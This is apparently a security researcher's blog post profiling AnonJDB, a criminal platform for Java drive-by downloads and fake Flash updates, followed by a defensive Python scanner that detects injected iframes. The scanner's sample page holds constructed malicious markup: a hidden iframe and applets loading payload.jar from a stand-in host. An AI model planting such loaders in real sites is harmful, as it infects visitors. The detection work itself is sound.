Inside AnonJDB - a Java based malware distribution platform for drive-by downloads

by Dancho Danchev
With the ever decreasing prices of underground tools and services, thanks to the commoditization of these very same market items, the price for renting a botnet, or purchasing access to already infected hosts, is constantly decreasing.
Although the majority of cybercriminals actively exploit end users and corporate users through client-side vulnerabilities in outdated third-party applications and browser plugins, a separate branch of cybercriminals specializes in delivering their payload using nothing but good old-fashioned social engineering attacks.
Following my previous post Inside a clickjacking/likejacking scam distribution platform for Facebook, in this post I will profile AnonJDB – a Java based malware distribution platform for drive-by downloads.
What exactly is AnonJDB?
Some of its features include:
A peek inside AnonJDB’s command and control interface:
Package prices for AnonJDB:
What’s particularly interesting about AnonJDB is its easy-to-manage command and control interface, and the fact that the cybercriminals are offering Dual Infection Via Adobe Flash Update, similar to the fake Adobe Flash Player screen profiled in my previous post Inside a clickjacking/likejacking scam distribution platform for Facebook.
In the past, malicious attackers used to rely on compromised FTP accounts to embed malicious iFrames within the compromised domains. Nowadays, the service is outsourced to a vendor offering managed hosting services for the entire platform, including the supply of fully undetected malicious Java applets and executable binaries.
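The delivery chain described above (an injected iFrame on a compromised site that pulls in a Java applet) leaves visible traces in the page markup that a site owner can scan for. The following scanner is an added example written for this post, not code from AnonJDB or from the author; the sample HTML, hostnames and file names in it are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: one legitimate iframe plus an injected zero-size
# iframe and two Java applet loaders, mimicking the pattern described above.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="http://legit.example/widget" width="300" height="200"></iframe>
<iframe src="http://bad.example/loader.php" width="0" height="0" style="visibility:hidden"></iframe>
<applet code="Loader.class" archive="http://bad.example/payload.jar" width="1" height="1"></applet>
<object type="application/x-java-applet" width="0" height="0">
  <param name="archive" value="http://bad.example/p2.jar">
</object>
</body></html>
"""

HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)

class DriveByScanner(HTMLParser):
    """Flags hidden iframes and Java applet loaders in served HTML."""
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (indicator, reference) tuples
        self._in_object = None  # attrs of the <object> currently open, if any

    @staticmethod
    def _tiny(attrs):
        # Width or height of 0/1 (with or without "px") is a classic hiding trick.
        dims = [attrs.get("width"), attrs.get("height")]
        return any(d is not None and d.strip().rstrip("px") in ("0", "1") for d in dims)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            if self._tiny(a) or HIDDEN_STYLE.search(a.get("style") or ""):
                self.findings.append(("hidden_iframe", a.get("src") or ""))
        elif tag == "applet":
            self.findings.append(("java_applet", a.get("archive") or a.get("code") or ""))
        elif tag == "object":
            self._in_object = a
            if "java" in (a.get("type") or "").lower() or "java" in (a.get("classid") or "").lower():
                self.findings.append(("java_object", a.get("data") or ""))
        elif tag == "param" and self._in_object is not None:
            if (a.get("name") or "").lower() == "archive" and (a.get("value") or "").lower().endswith(".jar"):
                self.findings.append(("java_archive_param", a["value"]))

    def handle_endtag(self, tag):
        if tag == "object":
            self._in_object = None

def scan(html):
    """Return the (indicator, reference) findings for one HTML document."""
    p = DriveByScanner()
    p.feed(html)
    return p.findings
```

Running scan() periodically against a site's own served pages, and diffing the findings against a known-clean baseline, surfaces an injected iFrame or applet loader long before a visitor reports an infection.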
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.